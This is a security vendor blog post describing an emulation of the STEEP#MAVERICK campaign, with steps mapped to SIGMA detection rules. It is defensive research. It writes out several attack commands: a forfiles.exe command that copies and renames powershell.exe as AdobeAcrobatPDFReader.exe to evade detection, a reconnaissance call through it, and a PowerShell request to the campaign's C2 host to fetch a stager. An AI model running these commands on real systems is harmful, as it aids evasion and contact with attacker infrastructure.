Threat Thursday

SCYTHE Library: STEEP#MAVERICK: Rename Adobe

Written by Kristen Cotten | Nov 3, 2022 4:00:00 AM

The next installment of our STEEP#MAVERICK emulation series highlights a defense evasion technique leveraged by the threat actor shortly after initial infection. Similar to many targeted campaigns, initial infection begins with a phishing email containing a malicious attachment. In STEEP#MAVERICK, the email contained a compressed (.zip) file with a shortcut (.lnk) file inside. The shortcut file attempts to hide its execution by calling forfiles.exe.

Our emulation begins here with a step where the threat actor calls forfiles.exe to copy powershell.exe to C:\Windows and rename it to AdobeAcrobatPDFReader.

We then use the newly renamed powershell to obtain the name of the domain the device belongs to and if a hypervisor is present. The threat actor did not perform this step in the campaign but we include it here to provide a detection opportunity.

The following step is where we mimic a C2 connection to hxxps://terma[.]dev/0 to pull down the initial stager. 

Clean-up steps to remove the renamed powershell.exe file are included after a 3 minute delay.

Detection Opportunities

Step Number Request SIGMA Rule(s) Author(s)
4 run forfiles.exe /c "cmd.exe /c copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\AdobeAcrobatPDFReader.exe Creation of an Executable by an Executable frack113
    Indirect Command Execution E.M. Anhaus, oscd.community
    Suspicious Copy From or To System32 Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update)
    Suspicious In-Memory Module Execution Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro
5 run C:\windows\AdobeAcrobatPDFReader.exe /c Get-ComputerInfo -Property CsDomain, HyperVisorPresent Highly Relevant Renamed Binary Matthew Green - @mgreen27, Florian Roth
    In-memory PowerShell Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton
    Renamed Binary Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades)
    Renamed PowerShell Florian Roth, frack113
    Suspicious In-Memory Module Execution Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro
8 upsh --cmd Invoke-Command -ScriptBlock { try { $response = Invoke-WebRequest -Uri https://terma.dev/0 -TimeoutSec 15 } catch { $_.Exception.Response.StatusCode.Value__ } } Alternate PowerShell Hosts Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
    Alternate PowerShell Hosts Pipe Roberto Rodriguez @Cyb3rWard0g, Tim Shelton
    In-memory PowerShell Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton
    Raw Disk Access Using Illegitimate Tools Teymur Kheirkhabarov, oscd.community
    Suspicious WSMAN Provider Image Loads Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)

This post discusses active research by SCYTHE and other cited third parties into an ongoing threat.  The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.

References